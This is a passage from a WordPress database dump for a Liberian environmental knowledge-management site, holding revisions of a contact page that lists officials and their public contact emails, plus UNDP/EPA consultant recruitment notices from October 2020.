14:00:46','2020-10-21 14:00:46','','IMG_20200908_105852_513','','inherit','open','closed','','img_20200908_105852_513','','','2020-10-21 14:00:46','2020-10-21 14:00:46','',80,'https://ekmsliberia.info/wp-content/uploads/2020/10/IMG_20200908_105852_513.jpg',0,'attachment','image/jpeg',0),(3168,42,'2020-10-21 14:01:30','2020-10-21 14:01:30','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/1-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-21 14:01:30','2020-10-21 14:01:30','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3169,42,'2020-10-21 14:04:58','2020-10-21 14:04:58','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/1-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-21 14:04:58','2020-10-21 14:04:58','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3170,42,'2020-10-21 15:01:13','2020-10-21 15:01:13','','Default Kit','','publish','closed','closed','','default-kit','','','2021-08-19 14:28:42','2021-08-19 14:28:42','',0,'https://ekmsliberia.info/?elementor_library=default-kit',0,'elementor_library','',0),(3171,42,'2020-10-22 09:33:59','2020-10-22 09:33:59','','aw2','','inherit','open','closed','','aw2','','','2020-10-22 09:33:59','2020-10-22 09:33:59','',80,'https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg',0,'attachment','image/jpeg',0),(3172,42,'2020-10-22 09:34:26','2020-10-22 09:34:26','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/aw2-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/1-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-22 09:34:26','2020-10-22 09:34:26','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3173,42,'2020-10-22 09:37:55','2020-10-22 09:37:55','','AW','','inherit','open','closed','','aw','','','2020-10-22 09:37:55','2020-10-22 09:37:55','',80,'https://ekmsliberia.info/wp-content/uploads/2020/10/AW.jpg',0,'attachment','image/jpeg',0),(3174,42,'2020-10-22 09:38:26','2020-10-22 09:38:26','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-22 09:38:26','2020-10-22 09:38:26','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3175,42,'2020-10-27 10:01:03','2020-10-27 10:01:03','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong><strong>to </strong><em>Prepare and validate the methodology to update the NCSA and integrate the post-2015 SDGs</em>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\r\n\r\nLink: <a href=\"http://www.epa.gov.lr/sites/default/files/National%20Consultant%20CCCD.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><em>Prepare and Validate the Methodology to Update the NCSA and Integrate the Post-2015 SDGs</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-006, Prepare and Validate the Methodology to Update the NCSA and Integrate the Post-2015 SDGs.','','publish','closed','closed','','refrence-no-tor-cccd-epa-2020-006-strengthening-national-capacities-to-meet-global-environmental-obligations-with-the-framework-of-sustainable-development-priorities','','','2021-08-19 09:02:37','2021-08-19 09:02:37','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3175',124,'ekms_bulletin','',0),(3178,42,'2020-10-27 10:44:40','2020-10-27 10:44:40','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong>to <em>Develop an applicable awareness module for institutions on Rio Conventions mainstreaming, monitoring and evaluation.</em> This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\r\n\r\nLink: <a href=\"http://www.epa.gov.lr/sites/default/files/National%20Consultant%20CCCD%202.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><em>Develop an Awareness Module for Institutions on Rio Conventions Mainstreaming</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-007, Develop an Awareness Module for Institutions on Rio Conventions Mainstreaming, Monitoring and Evaluation','','publish','closed','closed','','refrence-no-tor-cccd-epa-2020-006-develop-an-awareness-module-for-institutions-on-rio-conventions-mainstreaming-monitoring-and-evaluation','','','2021-08-19 09:01:08','2021-08-19 09:01:08','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3178',123,'ekms_bulletin','',0),(3179,42,'2020-10-27 10:38:31','2020-10-27 10:38:31','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong><strong>to </strong><em>Prepare and validate the methodology to update the NCSA and integrate the post-2015 SDGs</em>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory 